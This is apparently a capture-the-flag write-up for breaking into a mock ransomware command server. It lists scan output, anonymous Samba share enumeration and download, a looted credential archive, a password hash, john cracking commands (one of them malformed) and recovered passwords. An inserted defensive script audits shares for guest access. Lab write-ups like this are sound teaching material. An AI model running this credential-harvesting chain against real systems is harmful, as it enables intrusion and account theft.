DESCRIPTION
The network security monitoring system raises alerts about one IP address that the ransomware connected to.
Could this be the attacker's computer or a command & control server?
If you can access it, you might find something interesting.
QUESTION
Gain user-level access to the attacker's command & control server at 10.12.32.130
SOLUTION
Nmap scan report for 10.12.32.130
Host is up (0.00013s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:50:56:B8:E3:58 (VMware)
Service Info: Host: COMMAND_CONTROL_SRV1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
22 - SSH
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:50:56:B8:E3:58 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
root@cboekali-100:~/cncaccess# smbmap -H 10.12.32.130 -R
[+] Guest session IP: 10.12.32.130:445 Name: 10.12.32.130
Disk Permissions Comment
---- ----------- -------
Backup READ ONLY Server backups
.\Backup\*
dr--r--r-- 0 Tue Nov 10 19:36:01 2020 .
dr--r--r-- 0 Mon Nov 16 16:57:11 2020 ..
fr--r--r-- 652 Sun Oct 25 15:29:19 2020 README
dr--r--r-- 0 Sat Oct 24 21:34:33 2020 docs-backup
fr--r--r-- 3898 Tue Nov 10 19:36:01 2020 credz_backup.zip
.\Backup\docs-backup\*
dr--r--r-- 0 Sat Oct 24 21:34:33 2020 .
dr--r--r-- 0 Tue Nov 10 19:36:01 2020 ..
fr--r--r-- 355153 Tue Aug 8 21:15:53 2000 interunx.txt
fr--r--r-- 4736 Tue Aug 8 21:51:03 2000 arpanet.txt
fr--r--r-- 10379 Thu Sep 20 05:33:25 2001 hackpage.txt
fr--r--r-- 6292 Sun Aug 13 06:10:33 2000 hss.txt
fr--r--r-- 10708 Sun Aug 13 06:07:00 2000 hack.txt
fr--r--r-- 51966 Sat Jun 22 07:54:28 2002 admin2.txt
Exploits NO ACCESS Exploit collection. Priv access
Data-dumps NO ACCESS Dumped data. Priv access
IPC$ NO ACCESS IPC Service (command_control_SRV1 server C&C Samba)
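The smbmap listing above shows what a defender should be auditing for: a share readable by the guest session that holds a credential archive. The following is an added example, not part of the write-up, that parses smbmap -R output in the format shown and flags guest-readable shares and sensitive-looking file names; the sample listing and host 10.0.0.5 are constructed for the example.

```python
import re

# Constructed sample in the same layout as smbmap -R output (host and
# share contents are made up for this example).
SAMPLE = """\
[+] Guest session   IP: 10.0.0.5:445  Name: 10.0.0.5
        Disk                 Permissions  Comment
        ----                 -----------  -------
        Backup               READ ONLY    Server backups
        .\\Backup\\*
        dr--r--r--    0 Tue Nov 10 19:36:01 2020    .
        fr--r--r--  652 Sun Oct 25 15:29:19 2020    README
        fr--r--r-- 3898 Tue Nov 10 19:36:01 2020    credz_backup.zip
        Exploits             NO ACCESS    Exploit collection
        IPC$                 NO ACCESS    IPC Service
"""

# A share line: name followed by one of smbmap's permission strings.
SHARE_RE = re.compile(r"^\s*(\S+)\s+(READ ONLY|READ, WRITE|WRITE ONLY|NO ACCESS)\b")
# A file/directory entry: mode, size, "Www Mmm dd HH:MM:SS YYYY", name.
FILE_RE = re.compile(
    r"^\s*([df][rwx-]{9})\s+\d+\s+\w{3}\s+\w{3}\s+\d+\s+[\d:]+\s+\d{4}\s+(.+?)\s*$")
# File names that usually mean secrets are sitting on a share.
SUSPECT = re.compile(r"cred|passw|secret|backup|key", re.I)


def audit_smbmap(text):
    """Return (kind, share, detail) findings from smbmap output.

    kind is 'guest-readable-share' for shares open without credentials
    or 'sensitive-file' for files whose name matches SUSPECT.
    """
    findings = []
    guest = False
    share = None
    for line in text.splitlines():
        if line.startswith("[+] Guest session"):
            guest = True  # everything below was reached anonymously
        m = SHARE_RE.match(line)
        if m:
            share, perm = m.group(1), m.group(2)
            if guest and perm != "NO ACCESS":
                findings.append(("guest-readable-share", share, perm))
            continue
        m = FILE_RE.match(line)
        if m and m.group(1).startswith("f") and share:
            name = m.group(2)
            if SUSPECT.search(name):
                findings.append(("sensitive-file", share, name))
    return findings
```

Run it over saved smbmap output from an internal scan to list which hosts expose readable shares to unauthenticated sessions.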
Download all files on public shares:
smbget -R smb://10.12.32.130 -a
Password for credz_backup.zip: computer
User of CNC server: max
Password hash of the CNC server user (sha512crypt): $6$kzxfdnc2$uTn3VO..Xy9E9/ZVflghOsfd.KIzfyPhFOeVgs9pymY.RbTo85HQjn5oHfF3Y6rbZFMtNVsW3I8n/5hlGFYQv/
# unshadowed.txt holds the merged passwd/shadow line below; run john against it:
# john --wordlist=/usr/share/wordlists/john/all.lst unshadowed.txt --users=max --session=sess
max:$6$kzxfdnc2$uTn3VO..Xy9E9/ZVflghOsfd.KIzfyPhFOeVgs9pymY.RbTo85HQjn5oHfF3Y6rbZFMtNVsW3I8n/5hlGFYQv/:1000:1000::/home/max:/bin/bash
# SSH private key passphrase: qwerty
# john --wordlist=/usr/share/wordlists/rockyou.txt qwerty
(OpenSSH private key omitted)
Log in with SSH and get the flag.